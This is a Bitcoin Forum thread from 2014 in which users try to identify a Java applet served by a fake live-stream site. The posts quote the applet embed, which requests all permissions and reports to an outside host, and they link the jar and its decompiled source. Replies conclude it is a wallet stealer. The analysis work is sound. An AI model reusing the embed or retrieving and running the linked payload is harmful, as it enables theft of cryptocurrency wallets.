Bitcoin Forum
May 06, 2024, 07:41:36 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Java Bitcoin Virus ? Trying to guess what this does...  (Read 1132 times)
Stingery64 (OP)
Newbie
*
Offline Offline

Activity: 59
Merit: 0


View Profile
January 14, 2014, 12:15:44 PM
 #1

hi

this web cryptonewsonline.c0m   (i put a zero so no one enter by mistake)

is simulating the load a live youtube conection,
but its all fake as the pictures are listed in the own web and there is no link to youtube in the source code:
http://cryptonewsonline.com/stream/stylesheets/images/

When you click in the image of the Live connection, it links to: http://cryptonewsonline.c0m/post.htm
and tries to load a .jar file,
and in case you dont have java isntalled, the browser will promp you to install java as a missing connector needed.

thats the code of post.htm :

--------------------
<applet code="Za.class" archive="Traditional.jar" width="10" height="10">
  <param name="permissions" value="all-permissions">
  <param name="fun" value="http://galaxypanel.pw/insert.php?&t=traditional&p=http://cryptonewsonline.com/post.htm&b=Opera&o=OS&u=USAR&e=">
  <param name="centerimage" value="true">
  <param name="image" value="https://www.java.net/blog/campbell/archive/images/orangebox.png">
</applet>
--------------------


the .jar is this one:

http://cryptonewsonline.com/Traditional.jar

I opened the compiled java file with Java Decompiler (a portable application to read the source)
but i can't really find what they are doing all those classes,

maybe someone want take a look?

here is a java decoompiler portable: http://jd.benow.ca

https://i.imgur.com/EIlcoHC.png


"This isn't the kind of software where we can leave so many unresolved bugs that we need a tracker for them." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714981296
Hero Member
*
Offline Offline

Posts: 1714981296

View Profile Personal Message (Offline)

Ignore
1714981296
Reply with quote  #2

1714981296
Report to moderator
1714981296
Hero Member
*
Offline Offline

Posts: 1714981296

View Profile Personal Message (Offline)

Ignore
1714981296
Reply with quote  #2

1714981296
Report to moderator
1714981296
Hero Member
*
Offline Offline

Posts: 1714981296

View Profile Personal Message (Offline)

Ignore
1714981296
Reply with quote  #2

1714981296
Report to moderator
Stingery64 (OP)
Newbie
*
Offline Offline

Activity: 59
Merit: 0


View Profile
January 14, 2014, 04:36:19 PM
 #2

https://gist.github.com/anonymous/7ba7ad6f13f73dcf68c1

here is all the source code in case someone want check it out much quicker,
grue
Legendary
*
Offline Offline

Activity: 2058
Merit: 1431



View Profile
January 14, 2014, 04:57:40 PM
 #3

code is obfuscated; no point in doing static analysis. I would recommend running in a VM and attach a debugger.

It is pitch black. You are likely to be eaten by a grue.

Adblock for annoying signature ads | Enhanced Merit UI
tom_o
Sr. Member
****
Offline Offline

Activity: 308
Merit: 250


View Profile
January 23, 2014, 04:05:20 PM
 #4

Wallet stealer it seems

https://bitcointalk.org/index.php?topic=423526
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!